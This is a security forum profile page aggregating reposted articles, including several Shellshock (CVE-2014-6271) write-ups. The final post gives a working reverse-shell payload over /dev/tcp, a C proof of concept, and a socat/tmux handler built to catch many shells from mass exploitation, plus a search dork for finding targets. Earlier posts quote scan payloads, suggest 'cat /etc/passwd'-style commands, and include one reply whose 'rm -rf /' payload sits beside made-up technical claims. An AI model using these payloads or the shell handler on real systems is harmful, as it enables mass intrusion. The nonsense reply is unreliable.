Jump to content

Nytro

Administrators
  • Posts

    18749
  • Joined

  • Last visited

  • Days Won

    720

Everything posted by Nytro

  1. Kickbox, MMA sau krav maga.
  2. A fost fixat si acesta.
  3. Description This application is based on MiTeC Portable Executable Reader. It reads and displays executable file properties and structure. It is compatible with PE32 (Portable Executable), PE32+ (64bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too. It enumerates introduced classes, used units and forms for files compiled by Borland compilers. It contains powerfull Resource Viewer that is able to abalyze and display al basic resouce types and some extra ones as JPEG, PNG, GIF, AVI, REGISTRY. It contains excellent Type Library viewer that enumerates all objects and creates import interface unit in Object Pascal language. Every type of resource can be saved to file. EXE Explorer produces text report with all important information about selected file. Searching capability is also available. It searches all resources that can be interpreted as text. Here are enumerated structures that are evaluated: DOS, File, Optional and CLR headers CLR Metadata streams Sections Directories Imports Exports Resources ASCII and Unicode Strings .NET Metadata Load Config Debug Thread Local Storage Exceptions Units Forms Packages Classes Flags Version Info Hexadecimal File Content View [TABLE] [TR] [TD][/TD] [TD] Screenshots[/TD] [/TR] [/TABLE] Download: http://www.mitec.cz/Downloads/EXE.zip Sursa: MiTeC Homepage
  4. Cine se ofera voluntar ca intermediar? Nu cred ca vrea nimeni sa se complice pentru 5 dolari care i-ar ramane la o tranzactie.
  5. Am mai pierdut un camarad... S-a insurat. In aceasta poza: - Nytro - Tinkode - Denjacker (daemien) Ghiciti voi care cine e.
  6. Nytro

    Typo3 CMS

    E ok. Au echipa interna de security care rezolva problemele si nu apar publice. E sigur si stabil.
  7. New processes are created by the two related interfaces fork and exec. Fork When you come to metaphorical "fork in the road" you generally have two options to take, and your decision effects your future. Computer programs reach this fork in the road when they hit the fork() system call. At this point, the operating system will create a new process that is exactly the same as the parent process. This means all the state that was talked about previously is copied, including open files, register state and all memory allocations, which includes the program code. The return value from the system call is the only way the process can determine if it was the existing process or a new one. The return value to the parent process will be the Process ID (PID) of the child, whilst the child will get a return value of 0. At this point, we say the process has forked and we have the parent-child relationship as described above. Exec Forking provides a way for an existing process to start a new one, but what about the case where the new process is not part of the same program as parent process? This is the case in the shell; when a user starts a command it needs to run in a new process, but it is unrelated to the shell. This is where the exec system call comes into play. exec will replace the contents of the currently running process with the information from a program binary. Thus the process the shell follows when launching a new program is to firstly fork, creating a new process, and then exec (i.e. load into memory and execute) the program binary it is supposed to run. How Linux actually handles fork and exec clone In the kernel, fork is actually implemented by a clone system call. This clone interfaces effectively provides a level of abstraction in how the Linux kernel can create processes. clone allows you to explicitly specify which parts of the new process are copied into the new process, and which parts are shared between the two processes. This may seem a bit strange at first, but allows us to easily implement threads with one very simple interface. Threads While fork copies all of the attributes we mentioned above, imagine if everything was copied for the new process except for the memory. This means the parent and child share the same memory, which includes program code and data. Figure 5.4. Threads The memory (including program code and variables) of the process are shared by the threads, but each has it's own kernel state, so they can be running different parts of the code at the same time. This hybrid child is called a thread. Threads have a number of advantages over where you might use fork Separate processes can not see each others memory. They can only communicate with each other via other system calls. Threads however, share the same memory. So you have the advantage of multiple processes, with the expense of having to use system calls to communicate between them. The problem that this raises is that threads can very easily step on each others toes. One thread might increment a variable, and another may decrease it without informing the first thread. These type of problems are called concurrency problems and they are many and varied. To help with this, there are userspace libraries that help programmers work with threads properly. The most common one is called POSIX threads or, as it more commonly referred to pthreads Switching processes is quite expensive, and one of the major expenses is keeping track of what memory each process is using. By sharing the memory this overhead is avoided and performance can be significantly increased. There are many different ways to implement threads. On the one hand, a userspace implementation could implement threads within a process without the kernel having any idea about it. The threads all look like they are running in a single process to the kernel. This is suboptimal mainly because the kernel is being withheld information about what is running in the system. It is the kernels job to make sure that the system resources are utilised in the best way possible, and if what the kernel thinks is a single process is actually running multiple threads it may make suboptimal decisions. Thus the other method is that the kernel has full knowledge of the thread. Under Linux, this is established by making all processes able to share resources via the clone system call. Each thread still has associated kernel resources, so the kernel can take it into account when doing resource allocations. Other operating systems have a hybrid method, where some threads can be specified to run in userspace only ("hidden" from the kernel) and others might be a light weight process, a similar indication to the kernel that the processes is part of a thread group. Copy on write As we mentioned, copying the entire memory of one process to another when fork is called is an expensive operation. One optimisation is called copy on write. This means that similar to threads above, the memory is actually shared, rather than copied, between the two processes when fork is called. If the processes are only going to be reading the memory, then actually copying the data is unnecessary. However, when a process writes to it's memory, it needs to be a private copy that is not shared. As the name suggests, copy on write optimises this by only doing the actual copy of the memory at the point when it is written to. Copy on write also has a big advantage for exec. Since exec will simply be overwriting all the memory with the new program, actually copying the memory would waste a lot of time. Copy on write saves us actually doing the copy. The init process We discussed the overall goal of the init process previously, and we are now in a position to understand how it works. On boot the kernel starts the init process, which then forks and execs the systems boot scripts. These fork and exec more programs, eventually ending up forking a login process. The other job of the init process is "reaping". When a process calls exit with a return code, the parent usually wants to check this code to see if the child exited correctly or not. However, this exit code is part of the process which has just called exit. So the process is "dead" (e.g. not running) but still needs to stay around until the return code is collected. A process in this state is called a zombie (the traits of which you can contrast with a mystical zombie!) A process stays as a zombie until the parent collects the return code with the wait call. However, if the parent exits before collecting this return code, the zombie process is still around, waiting aimlessly to give it's status to someone. In this case, the zombie child will be reparented to the init process which has a special handler that reaps the return value. Thus the process is finally free and can the descriptor can be removed from the kernels process table. Zombie example Example 5.3. Zombie example process   1    $ cat zombie.c    #include <stdio.h>    #include <stdlib.h>   5    int main(void)    {    pid_t pid;     10 printf("parent : %d\n", getpid());       pid = fork();       if (pid == 0) {  15 printf("child : %d\n", getpid());    sleep(2);    printf("child exit\n");    exit(1);    }  20    /* in parent */    while (1)    {    sleep(1);  25 }    }       ianw@lime:~$ ps ax | grep [z]ombie    16168 pts/9 S 0:00 ./zombie  30 16169 pts/9 Z 0:00 [zombie] <defunct>    Above we create a zombie process. The parent process will sleep forever, whilst the child will exit after a few seconds. Below the code you can see the results of running the program. The parent process (16168) is in state S for sleep (as we expect) and the child is in state Z for zombie. The ps output also tells us that the process is defunct in the process description.[16] [16] The square brackets around the "z" of "zombie" are a little trick to remove the grep processes its self from the ps output. grep interprets everything between the square brackets as a character class, but because the process name will be "grep [z]ombie" (with the brackets) this will not match! Sursa: Fork and Exec
  8. The WPScan software and its data (henceforth both referred to simply as "WPScan") is dual-licensed - copyright 2011-2014 The WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, the system can be used under the terms of the GNU General Public License. Cases of commercialization are: Using WPScan to provide commercial managed/Software-as-a-Service services. Distributing WPScan as a commercial product or as part of one. Cases which do not require a commercial license, and thus fall under the terms of GNU General Public License, include (but are not limited to): Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. So long as that does not conflict with the commercialization clause. Using WPScan to test your own systems. Any non-commercial use of WPScan. If you need to acquire a commercial license or are unsure about whether you need to acquire a commercial license, please get in touch, we will be happy to clarify things for you and work with you to accommodate your requirements. wpscanteam at gmail.com You should have received a copy of the GNU General Public License along with this program. If not, see Licenses - GNU Project - Free Software Foundation. [h=4]INSTALL[/h] WPScan comes pre-installed on the following Linux distributions: BackBox Linux Kali Linux Pentoo SamuraiWTF ArchAssault Prerequisites: Ruby >= 1.9.2 - Recommended: 2.1.2 Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault RubyGems - Recommended: latest Git Windows is not supported. Sursa: https://github.com/wpscanteam/wpscan
  9. Este usor de exploatat pentru un singur server, insa se complica lucrurile pentru mai multe servere. De exemplu, un clasic (){:;}; rm -rf / nu va merge pe orice server, deoarece multe servere au SELinux peste kernel, iar grsecurity opreste exploatarea inca din layer-ul 2 de retea! Singurul lucru care se poate incerca, e un exploit de privilege escalation, prin care controland ESP-ul, sa modifici page memory-ul care contine acel script si astfel sa faci bypass schimband protocolul din TCP in ICMP. Dar iti dai seama ca este dificil sa faci asa ceva, mai ales ca sunt foarte multe versiuni de kernel si ca sa fie compatibil va trebui sa gasesti semnaturi pentru functii si IOCTL-uri care controleaza SSDT-ul si valideaza integritatea codului... Adica cel mai bine citeste articolele si incearca sa le intelegi, nu e asa dificil.
  10. Nici nu o sa mearga vreodata. Ai citit macar un articol despre problema? Stii tu, acel "() {" ?
  11. Aveti aici 6 articole detaliate despre aceasta problema: https://rstforums.com/forum/tutoriale-engleza.rst
  12. Request HTTP cu User-Agent/Cookie/Referrer setat ca functie ce face ping/curl/wget de exemplu. Sau cat /etc/passwd. Sau afiseaza ceva, orice.
  13. Nytro

    Kartoffel

    Kartoffel is a extensible command-line tool developed with the aim of helping developers to test the security and the reliability of a driver. Kartoffel exposes most of its features via the static library kartolib, thus you can build your own K-plugins to test exploits or PoCs, simulate I/O request or develop stand-alone programs. Sursa: Kartoffel - Secure Your Driver -
  14. SpoofMAC - Spoof your MAC address For OS X, Windows, and Linux (most flavors) I made this because changing your MAC address in Mac OS X is harder than it should be. The biggest annoyance is that the Wi-Fi card (Airport) needs to be manually disassociated from any connected networks in order for the change to be applied correctly. Doing this manually every time is tedious and lame. Instead of doing that, just run this Python script and change your MAC address in one command. Now for Windows and Linux, too! Installation You can install from PyPI using pip or easy_install: pip install SpoofMAC easy_install SpoofMAC or clone/download the repository and install with setup.py. Ex: git clone git://github.com/feross/SpoofMAC.git cd SpoofMAC python setup.py install If you're not using the system Python (because you use Homebrew, for example), make sure you add '/usr/local/share/python/' (or equivalent) to your path. Or, consider using spoof, a node.js port of this package. Sursa: https://github.com/feross/SpoofMAC
  15. Kevin Mitnick, Once the World’s Most Wanted Hacker, Is Now Selling Zero-Day Exploits By Andy Greenberg 09.24.14 | 11:41 am | Permalink Mitnick showing a keylogging device to a crowd in 2010. Credit: Eneas De Troya | CC BY As a young man, Kevin Mitnick became the world’s most notorious black hat hacker, breaking into the networks of companies like IBM, Nokia, Motorola, and other targets. After a stint in prison, he reinvented himself as a white hat hacker, selling his skills as a penetration tester and security consultant. With his latest business venture, Mitnick has switched hats again: This time to an ambiguous shade of gray. Late last week, Mitnick revealed a new branch of his security consultancy business he calls Mitnick’s Absolute Zero Day Exploit Exchange. Since its quiet inception six months ago, he says the service has offered to sell corporate and government clients high-end “zero-day” exploits, hacking tools that take advantage of secret bugs in software for which no patch yet exists. Mitnick says he’s offering exploits developed both by his own in-house researchers and by outside hackers, guaranteed to be exclusive and priced at no less than $100,000 each, including his own fee. And what will his clients do with those exploits? “When we have a client that wants a zero-day vulnerability for whatever reason, we don’t ask, and in fact they wouldn’t tell us,” Mitnick tells WIRED in an interview. “Researchers find them, they sell them to us for X, we sell them to clients for Y and make the margin in between.” Mitnick declined to name any of his customers, and wouldn’t say how many, if any, exploits his exchange has brokered so far. But the website he launched to reveal the project last week offers to use his company’s “unique positioning among security researchers and the hacker community” to connect exploit developers with “discerning government and corporate buyers.” As the zero day market has come to light over the last several years, freelance hackers’ sale of potential surveillance tools to government agencies has become a hotly debated ethical quandary in the security community. The notion of Kevin Mitnick selling those tools could be particularly eyebrow-raising; After all, Mitnick became a symbol of government oppression in the late 1990s, when he spent four and a half years in prison and eight months in solitary confinement before his trial on hacking charges. The outcry generated a miniature industry in “Free Kevin” T-shirts and bumper stickers. Enabling targeted surveillance also clashes with Mitnick’s new image as a privacy advocate; His forthcoming book titled “The Art of Invisibility” promises to teach readers “cloaking and countermeasures” against “Big Brother and big data.” “It’s like an Amazon wish list of exploits.” He says his intended customers aren’t necessarily governments. Instead, he points to penetration testers and antivirus firms as potential exploit buyers, and even suggests that companies might pay him for vulnerabilities in their own products. “I’m not interested in helping government agencies spy on people,” he says. “I have a unique history with the government. These are the same people who locked me in solitary because they thought I could whistle nuclear launch codes.” Still, the six-figure fees Mitnick names on his site are far more than most buyers would pay for mere defensive purposes. (Though his website names a minimum price of $200,000, Mitnick says that’s an error, and that he’s willing to deal in exploits worth half that much.) Companies like Facebook and Paypal generally pay tens of thousands of dollars at most for information about bugs in their products, though Google occasionally pays as much as $150,000 in hacking contest prizes. Mitnick’s exploit exchange seems designed to cater particularly to high-end buyers. It lists two options: Absolute X, which lets clients pay for exclusive use of whatever hacking exploits Mitnick’s researchers dig up, and Absolute Z, a more premium service that seeks to find new zero-days that target whatever software the client chooses. “We have some clients that give us a menu of what they’re looking for, like ‘We’re looking for an exploit in this version of Chrome,’” he says. “It’s like an Amazon wish list of exploits.” Mitnick is far from the only hacker to see an opportunity in the growing grey market for zero days. Other firms like Vupen, Netragard, Exodus Intelligence, and Endgame Systems have all sold or brokered secret hacking techniques. While the trade is legal, critics have argued that the services’ lax customer policies make it possible for repressive regimes or even criminals to gain access to dangerous hacking tools. But Mitnick counters that he’ll carefully screen his buyers. “I would’t consider in a million years selling to a government like Syria or to a criminal organization,” he says. “Customers want to buy this information, and they’ll pay a certain price. If they pass our screening process, we’ll work with them.” As an ex-convict, Mitnick’s entrance into the zero-day market may mean he’ll face extra scrutiny himself. From his teens to his early 30s, after all, Mitnick went on an epic intrusion spree through the networks of practically every major tech firm of the day, including Digital Equipment, Sun Microsystems, Silicon Graphics, and many more. For two and a half years, he led the FBI on a manhunt that made him the most wanted hacker in the world at the time of his arrest in 1995. ACLU technologist Chris Soghoian, a vocal critic of the zero-day exploit business, used that criminal past to take a jab at Mitnick on Twitter following his announcement of the bug-selling brokerage. Mitnick shot back: “My clients may use them to monitor your activities? How do you like them apples, Chris?” Sursa: Kevin Mitnick, Once the World's Most Wanted Hacker, Is Now Selling Zero-Day Exploits | WIRED
  16. Thursday, September 25, 2014 Remember Heartbleed? If you believe the hype today, Shellshock is in that league and with an equally awesome name albeit bereft of a cool logo (someone in the marketing department of these vulns needs to get on that). But in all seriousness, it does have the potential to be a biggie and as I did with Heartbleed, I wanted to put together something definitive both for me to get to grips with the situation and for others to dissect the hype from the true underlying risk. To set the scene, let me share some content from Robert Graham’s blog post who has been doing some excellent analysis on this. Imagine an HTTP request like this: target = 0.0.0.0/0 port = 80 banners = true http-user-agent = shellshock-scan (Errata Security: Bash 'shellshock' scan of the Internet) http-header = Cookie:() { :; }; ping -c 3 209.126.230.74 http-header = Host:() { :; }; ping -c 3 209.126.230.74 http-header = Referer:() { :; }; ping -c 3 209.126.230.74 Which, when issued against a range of vulnerable IP addresses, results in this: Put succinctly, Robert has just orchestrated a bunch of external machines to ping him simply by issuing a carefully crafted request over the web. What’s really worrying is that he has effectively caused these machines to issue an arbitrary command (albeit a rather benign ping) and that opens up a whole world of very serious possibilities. Let me explain. What is Bash and why do we need it? Skip this if it’s old news, but context is important for those unfamiliar with Bash so let’s establish a baseline understanding. Bash is a *nix shell or in other words, an interpreter that allows you to orchestrate commands on Unix and Linux systems, typically by connecting over SSH or Telnet. It can also operate as a parser for CGI scripts on a web server such as we’d typically see running on Apache. It’s been around since the late 80s where it evolved from earlier shell implementations (the name is derived from the Bourne shell) and is enormously popular. There are other shells out there for Unix variants, the thing about Bash though is that it’s the default shell for Linux and Mac OS X which are obviously extremely prevalent operating systems. That’s a major factor in why this risk is so significant – the ubiquity of Bash – and it’s being described as “one of the most installed utilities on any Linux system”. You can get a sense of the Bash footprint when you look at the latest Netcraft web server stats: When half the net is running Apache (which is typically found on Linux), that’s a significant size of a very, very large pie. That same Netcraft article is reporting that we’ve just passed the one billion websites mark too and whilst a heap of those are sharing the same hosts, that’s still a whole lot of Bash installations. Oh – that’s just web servers too, don’t forget there are a heap of other servers running Linux and we’ll come back to other devices with Bash a bit later too. Bash can be used for a whole range of typical administrative functions, everything from configuring websites through to controlling embedded software on a device like a webcam. Naturally this is not functionality that’s intended to be open to the world and in theory, we’re talking about authenticated users executing commands they’ve been authorised to run. In theory. What’s the bug? Let me start with the CVE from NIST vulnerability database because it gives a good sense of the severity (highlight mine): GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. They go on to rate it a “10 out of 10” for severity or in other words, as bad as it gets. This is compounded by the fact that it’s easy to execute the attack (access complexity is low) and perhaps most significantly, there is no authentication required when exploiting Bash via CGI scripts. The summary above is a little convoluted though so let’s boil it down to the mechanics of the bug. The risk centres around the ability to arbitrarily define environment variables within a Bash shell which specify a function definition. The trouble begins when Bash continues to process shell commands after the function definition resulting in what we’d classify as a “code injection attack”. Let’s look at Robert’s example again and we’ll just take this line: http-header = Cookie:() { :; }; ping -c 3 209.126.230.74 The function definition is () { :; }; and the shell command is the ping statement and subsequent parameters. When this is processed within the context of a Bash shell, the arbitrary command is executed. In a web context, this would mean via a mechanism such as a CGI script and not necessarily as a request header either. It’s worth having a read through the seclists.org advisory where they go into more detail, including stating that the path and query string could be potential vectors for the attack. Of course one means of mitigating this particular attack vector is simply to disable any CGI functionality that makes calls to a shell and indeed some are recommending this. In many cases though, that’s going to be a seriously breaking change and at the very least, one that going to require some extensive testing to ensure it doesn’t cause immediate problems in the website which in many cases, it will. The HTTP proof above is a simple but effective one, albeit just one implementation over a common protocol. Once you start throwing in Telnet and SSH and apparently even DHCP, the scope increases dramatically so by no means are we just talking about exploiting web app servers here. (Apparently the risk is only present in SSH post-auth, but at such an early stage of the public disclosure we’ll inevitably see other attack vectors emerge yet.) What you also need to remember is that the scope of potential damage stretches well beyond pinging an arbitrary address as in Robert’s example, that’s simply a neat little proof that he could orchestrate a machine to issue a shell command. The question becomes this: What damage could an attacker do when they can execute a shell command of their choosing on any vulnerable machine? What are the potential ramifications? The potential is enormous – “getting shell” on a box has always been a major win for an attacker because of the control it offers them over the target environment. Access to internal data, reconfiguration of environments, publication of their own malicious code etc. It’s almost limitless and it’s also readily automatable. There are many, many examples of exploits out there already that could easily be fired off against a large volume of machines. Unfortunately when it comes to arbitrary code execution in a shell on up to half the websites on the internet, the potential is pretty broad. One of the obvious (and particularly nasty) ones is dumping internal files for public retrieval. Password files and configuration files with credentials are the obvious ones, but could conceivably extend to any other files on the system. Likewise, the same approach could be applied to write files to the system. This is potentially the easiest website defacement vector we’ve ever seen, not to mention a very easy way of distributing malware Or how about this: one word I keep seeing a lot is “worm”: When we talk about worm in a malicious computing context, we’re talking about a self-replicating attack where a malicious actor creates code that is able to propagate across targets. For example, we saw a very effective implementation of this with Samy’s MySpace XSS Worm where some carefully crafted JavaScript managed to “infect” a million victims’ pages in less than a day. The worry with Shellshock is that an attack of this nature could replicate at an alarming rate, particularly early on while the majority of machines remain at risk. In theory, this could take the form of an infected machine scanning for other targets and propagating the attack to them. This would be by no means limited to public facing machines either; get this behind the corporate firewall and the sky’s the limit. People are working on exploiting this right now. This is what makes these early days so interesting as the arms race between those scrambling to patch and those scrambling to attack heats up. Which versions of Bash are affected? The headlines state everything through 4.3 or in other words, about 25 years’ worth of Bash versions. Given everyone keeps comparing this to Heartbleed, consider that the impacted versions of OpenSSL spanned a mere two years which is a drop in the ocean compared to Shellshock. Yes people upgrade their versions, but no they don’t do it consistently and whichever way you cut it, the breadth of at-risk machines is going to be significantly higher with Shellshock than what it was with Heartbleed. But the risk may well extend beyond 4.3 as well. Already we’re seeing reports of patches not being entirely effective and given the speed with which they’re being rolled out, that’s not all that surprising. This is the sort of thing those impacted by it want to keep a very close eye on, not just “patch and forget”. When did we first learn of it and how long have we been at risk? The first mention I’ve found on the public airwaves was this very brief summary on seclists.org which works out at about 18:00 GMT on Wednesday (about 2am today for those of us on the eastern end of Australia). The detail came in the advisory I mentioned earlier an hour later so getting towards late afternoon Wednesday in Europe or the middle of the day in the US. It’s still very fresh news with all the usual press speculation and Chicken Little predications; it’s too early to observe any widespread exploitation in the wild, but that could also come very soon if the risk lives up to its potential. Scroll back beyond just what has been disclosed publicly and the bug was apparently discovered last week by Stéphane Chazelas, a “Unix/Linux, network and telecom specialist” bloke in the UK. Having said that, in Akamai’s post on the bug, they talk about it having been present for “an extended period of time” and of course vulnerable versions of Bash go back two and a half decades now. The question, as with Heartbleed, will be whether or not malicious actors were aware of this before now and indeed whether they were actively exploiting it. Are our “things” affected? This is where it gets interesting – we have a lot of “things” potentially running Bash. Of course when I use this term I’m referring to the “Internet of Things” (IoT) which is the increasing prevalence of whacking an IP address and a wireless adaptor into everything from our cutlery to our door locks to our light globes. Many IoT devices run embedded Linux distributions with Bash. These very same devices have already been shown to demonstrate serious security vulnerabilities in other areas, for example LIFX light globes just a couple of months ago were found to be leaking wifi credentials. Whilst not a Bash vulnerability like Shellshock, it shows us that by connecting our things we’re entering a whole new world of vulnerabilities in places that were never at risk before. This brings with it many new challenges; for example, who is actively thinking they should regularly patch their light bulbs? Also consider the longevity of the devices this software is appearing in and whether they’re actually actively maintained. In a case like the vulnerable Trendnet cameras from a couple of years ago, there are undoubtedly a huge number of them still sitting on the web because in terms of patching, they’re pretty much a “set and forget” proposition. In fact in that case there’s an entire Twitter account dedicated to broadcasting the images it has captured of unsuspecting owners of vulnerable versions. It’s a big problem with no easy fixes and its going to stick with us for a very long time. But Bash shells are also present in many more common devices, for example our home routers which are generally internet-facing. Remember when you last patched the firmware on your router? Ok, if you’re reading this then maybe you’re the type of technical person who actually does patch their router, but put yourself in the shoes of Average Joe Consumer and ask yourself that again. Exactly. All our things are on the Microsoft stack, are we at risk? Short answer “no”, long answer “yes”. I’ll tackle the easy one first – Bash is not found natively on Windows and whilst there are Bash implementations for Windows, it’s certainly not common and it’s not going to be found on consumer PCs. It’s also not clear if products like win-bash are actually vulnerable to Shellshock in the first place. The longer answer is that just because you operate in a predominantly Microsoft-centric environment doesn’t mean that you don’t have Bash running on machines servicing other discrete purposes within that environment. When I wrote about Heartbleed, I referenced Nick Craver’s post on moving Stack Overflow towards SSL and referred to this diagram of their infrastructure: There are non-Microsoft components sitting in front of their Microsoft application stack, components that the traffic needs to pass through before it hits the web servers. These are also components that may have elevated privileges behind the firewall – what’s the impact if Shellshock is exploited on those? It could be significant and that’s the point I’m making here; Shellshock has the potential to impact assets beyond just at-risk Bash implementations when it exists in a broader ecosystem of other machines. I’m a system admin – what can I do? Firstly, discovering if you’re at risk is trivial as it’s such an easily reproducible risk. There’s a very simple test The Register suggests which is just running this command within your shell: env X="() { :;} ; echo busted" /bin/sh -c "echo stuff" You get “busted” echo’d back out and you’ve successfully exploited the bug. Of course the priority here is going to be patching at risk systems and the patch essentially boils down to ensuring no code can be executed after the end of a Bash function. Linux distros such as Red Hat are releasing guidance on patching the risk so jump on that as a matter of priority. We’ll inevitably also see definitions for intrusion detection systems too and certainly there will be common patterns to look for here. That may well prove a good immediate term implementation for many organisations, particularly where there may be onerous testing requirements before rolling out patches to at-risk systems. Qualys’ are aiming to have a definition to detect the attack pretty quickly and inevitably other IDS providers are working on this around the clock as well. Other more drastic options include replacing Bash with an alternate shell implementation or cordoning off at-risk systems, both of which could have far-reaching ramifications and are unlikely to be decisions taken lightly. But that’s probably going to be the nature of this bug for many people – hard decisions that could have tangible business impact in order to avoid potentially much more significant ramifications. The other issue which will now start to come up a lot is the question of whether Shellshock has already been exploited in an environment. This can be hard to determine if there’s no logging of the attack vectors (there often won’t be if it’s passed by HTTP request header or POST body), but it’s more likely to be caught than with Heartbleed when short of full on pcaps, the heartbeat payloads would not normally have been logged anywhere. But still, the most common response to “were we attacked via Shellshock” is going to be this: unfortunately, this isn't "No, we have evidence that there were no compromises;" rather, "we don't have evidence that spans the lifetime of this vulnerability." We doubt many people do - and this leaves system owners in the uncomfortable position of not knowing what, if any, compromises might have happened. Let the speculation about whether the NSA was in on this begin… I’m a consumer – what can I do? It depends. Shellshock affects Macs so if you’re running OS X, at this stage that appears to be at risk which on the one hand is bad due to the prevalence of OS X but on the other hand will be easily (and hopefully quickly) remediated due to a pretty well-proven update mechanism (i.e. Apple can remotely push updates to the machine). If you’re on a Mac, the risk is easily tested for as described in this Stack Exchange answer: It’s an easy test, although I doubt the average Mac user is going to feel comfortable stepping through the suggested fix which involves recompiling Bash. The bigger worry is the devices with no easy patching path, for example your router. Short of checking in with the manufacturer’s website for updated firmware, this is going to be a really hard nut to crack. Often routers provided by ISPs are locked down so that consumers aren’t randomly changing either config or firmware and there’s not always a remote upgrade path they can trigger either. Combine that with the massive array of devices and ages that are out there and this could be particularly tricky. Of course it’s also not the sort of thing your average consumer is going to be comfortable doing themselves either. In short, the advice to consumers is this: watch for security updates, particularly on OS X. Also keep an eye on any advice you may get from your ISP or other providers of devices you have that run embedded software. Do be cautious of emails requesting information or instructing you to run software – events like this are often followed by phishing attacks that capitalise on consumers’ fears. Hoaxes presently have people putting their iPhones in the microwave so don’t for a moment think that they won’t run a random piece of software sent to them via email as a “fix” for Shellshock! Summary In all likelihood, we haven’t even begun the fathom the breadth of this vulnerability. Of course there are a lot of comparisons being made to Heartbleed and there are a number of things we learned from that exercise. One is that it took a bit of time to sink in as we realised the extent to which we were dependent on OpenSSL. The other is that it had a very long tail – months after it hit there were still hundreds of thousands of known hosts left vulnerable. But in one way, the Heartbleed comparison isn’t fair – this is potentially far worse. Heartbleed allowed remote access to small amount of data in the memory of affected machines. Shellshock is enabling remote code injection of arbitrary commands pre-auth which is potentially far more dire. In that regard, I have to agree with Robert: It’s very, very early days yet – only half a day since it first hit the airwaves at the time of writing – and I suspect that so far we’re only scratching the surface of what is yet to come. Sursa: Troy Hunt: Everything you need to know about the Shellshock Bash bug
  17. CVE-2014-6271 / Shellshock & How to handle all the shells! Posted by Joel Eriksson ? 2014-09-25 ? Leave a Comment For the TL;DR generation: If you just want to know how to handle all the shells, search for “handling all the shells” and skip down to that. CVE-2014-6271, also known as “Shellshock”, is quite a neat little vulnerability in Bash. It relies on a feature in Bash that allows child processes to inherit shell functions that were defined in the parent. I have played around with this feauture before, many years ago, since it could be abused in another way in cases where SUID-programs execute external shell scripts (or use system()/popen(), when /bin/bash is the default system shell) and with certain daemons that support environment variable passing. When a SUID-program is the target, the SUID-program must first do something like setuid(geteuid()) for this to be exploitable, since inherited shell functions are not accepted when the UID differs from the EUID. When SUID-programs call out to shellscript helpers (that need to be executed with elevated privileges) this is usually done, since most shells automatically drop privileges when starting up. In those cases, it was possible to trick Bash into executing a malicious shell function even when PATH is set explicitly to a “safe” value, or even when the full path is used for all calls to external programs. This was possible due to Bash happily accepting slashes within shell function names. This example demonstrates this problem, as well as the new (and much more serious) CVE-2014-6271 vulnerability. je@tiny:~$ cat > bash-is-fun.c /* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */ #include <unistd.h> #include <stdio.h> int main() { char *envp[] = { "PATH=/bin:/usr/bin", "/usr/bin/id=() { " "echo pwn me twice, shame on me; }; " "echo pwn me once, shame on you", NULL }; char *argv[] = { "/bin/bash", NULL }; execve(argv[0], argv, envp); perror("execve"); return 1; } ^D je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c je@tiny:~$ ./bash-is-fun pwn me once, shame on you je@tiny:/home/je$ /usr/bin/id pwn me twice, shame on me As you can see, the environment variable named “/usr/bin/id” is set to “() { cmd1; }; cmd2?. Due to the CVE-2014-6271 vulnerability, any command that is provided as “cmd2? will be immediately executed when Bash starts. Due to the peculiarity I was already familiar with, the “cmd1? part is executed when trying to run id in a “secure” manner by providing the full path. One of the possibilities that crossed my mind when I got to know about this vulnerability was to exploit this over the web, due to CGI programs using environment variables to pass various information that can be arbitrarily controlled by an attacker. For instance, the user-agent string, is normally passed in the HTTP_USER_AGENT environment variable. It turns out I was not alone in thinking about this though, and shortly after information about the “Shellshock” vulnerability was released, Robert Graham at Errata Security started scanning the entire internet for vulnerable web servers. Turns out there are quite a few of them. The scan is quite limited in the sense that it only discovers cases where the default page (GET /) of the default virtual host is vulnerable, and it only uses the Host-, Referer- and Cookie-headers. Another convenient header to use is the User-Agent one, that is normally passed in the HTTP_USER_AGENT variable. Another way to find lots and lots of potentially vulnerable targets is to do a simple google search for “inurl:cgi-bin filetype:sh” (without the quotes). As you may have realized by now, the impact of this vulnerability is enormous. So, now to the part of handling all the shells. Let’s say you are testing a large subnet (or the entire internet) for this vulnerability, and don’t want to settle with a ping -c N ADDR-payload, as the one Robert Graham used in his PoC. A simple netcat listener is obviously no good, since that will only be useful to deal with a single reverse shell. My solution gives you as many shells as the amount of windows tmux can handle (a lot). Let’s assume you want a full reverse-shell payload, and let’s also assume that you want a full shell with job-control and a pty instead of the less convenient one you usually get under these circumstances. Assuming a Python interpreter is installed on the target, which is usually a pretty safe bet nowadays, I would suggest you to use a payload such as this (with ADDR and PORT replaced with your IP and port number, of course): () { :; }; bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/ADDR/PORT >&0 2>&0' To try this out, just run this in one shell to start a listener: stty -echo raw; nc -l 12345; stty sane Then do this in another shell: bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/127.0.0.1/12345 >&0 2>&0' To deal with all the shells coming your way I would suggest you to use some tmux+socat-magic I came up with when dealing with similar “problems” in the past. Place the code below in a file named “alltheshells-handler” and make it executable (chmod 700): #!/bin/sh tmux has-session -t alltheshells 2>/dev/null \ || tmux new-session -d -s alltheshells "cat>/dev/null" \; rename-window info tmux send-keys -t alltheshells:info "$(date '+%Y-%m-%d %H:%M:%S') Received a shell from $SOCAT_PEERADDR" Enter mkdir /tmp/alltheshells 2>/dev/null tmux new-window -d -t alltheshells -n "$SOCAT_PEERADDR" \ "sleep 1; stty -echo raw; socat unix-client:/tmp/alltheshells/$$.sock -; stty sane; echo; echo EOF; read" socat unix-listen:/tmp/alltheshells/$$.sock - Execute this command to start the listener handling all your shells (replace PORT with the port number you want to listen to): socat tcp-l:PORT,reuseaddr,fork exec:./alltheshells-handler When the shells start popping you can do: tmux attach -t alltheshells The tmux session will not be created until at least one reverse shell has arrived, so if you’re impatient just connect to the listener manually to get it going. If you want to try this with my personal spiced-up tmux configuration, download this: ########################### # Initialization ########################### # - Pastebin.com 